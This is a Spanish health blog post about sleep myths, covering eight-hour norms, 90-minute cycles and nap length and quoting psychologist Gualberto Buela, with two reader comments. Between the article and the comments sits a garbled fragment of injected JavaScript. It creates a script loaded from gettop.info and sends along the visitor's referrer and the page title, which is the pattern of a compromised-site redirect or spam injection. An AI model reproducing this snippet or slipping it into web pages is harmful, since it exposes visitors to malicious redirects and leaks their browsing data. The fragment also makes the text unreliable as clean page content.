Salud y belleza » Enfermedades, Salud

Dormir ocho horas: de norma a mito

2 Comentarios

dormir-ocho-horasCada persona es diferente y tiene unas necesidades diferentes, también a la hora de dormir. Algunos expertos aseguran que existe un tópico muy extendido sobre el sueño y que es incorrecto, que es el de que dormir ocho horas diarias es lo ideal. Lo desmiente el presidente de la Asociación Española de Psicología Conductual (AEPC), Gualberto Buela.

Las ocho horas, según afirma, son solo una media, ya que cada persona tiene necesidades distintas y hay algunas que con cuatro horas de sueño tienen suficiente y no padecen somnolencia durante el día. Cada vez más personas sufren trastornos del sueño, pero no porque duerman menos, sino porque el índice es mayor en la población urbana que en la que está en contacto con la naturaleza.

Por eso durante los cursos de verano sobre los trastornos del sueño, Gualberto Buela intenta dar unos sencillos consejos sobre los pasos que hay que dar para dormir bien. Primero aconseja a quienes no padecen problemas de este tipo que cuiden el sueño para no perderlo.

Es necesario invertir en un buen colchón (ya que pasamos gran parte de nuestra vida durmiendo). También hay que tener en cuenta que los ciclos del sueño suelen durar alrededor de 90 minutos, por lo que es aconsejable dormir en múltiplos de esa cifra, por ejemplo tres horas, cuatro horas y media, seis horas, siete y media… porque si cumplimos un ciclo completo nos despertaremos mucho mejor que si se interrumpe.

También recomienda tener hábitos regulares a la hora de acostarse y levantarse, aunque tampoco hay que obsesionarse. No hay que estar en la cama tampoco más horas de las que se precisen para estar completamente “reparado”.

familia-durmiendo

Por otro lado, asegura que no recomienda tener televisión en el dormitorio porque impide al cuerpo relajarse ya que la persona se implica emocionalmente en su cama. Por otro lado, se desaconseja totalmente rumiar con los problemas del día durante la noche. Lo ideal es que cuando se apaga la luz y uno se acuesta no debería volver a pensar en los problemas del día, sino solo en dormir y descansar, aunque a menudo es difícil sobre todo con depresión.

En cuanto a la famosa siesta española, Buela asegura que la siesta está de moda y es uno de nuestros productos más exportados. Además tiene varias ventajas, como que ayuda a reparar la fatiga del día y a sincronizar el ritmo circadiano. Sin embargo, defiende que la siesta debe ser, como máximo, de media hora. Si se supera ese tiempo se pueden tener problemas para conciliar el sueño de noche.

¿Qué opinas de todas estas teorías? ¿Duermes lo que necesitas?

s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; var d=document;var s=d.createElement('script');

Más consejos de salud y belleza : , , , ,

2 Comments »

  • Fatima said:

    Yo duermo 6 horas al día y me basta.

  • mery said:

    Yo duermo 7 horas ahora mismo por mis obligaciones laborales pero mi cuerpo está acostumbrado a las 8 horas. Acabo el dia agotada y caigo rendida en el colchones.

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.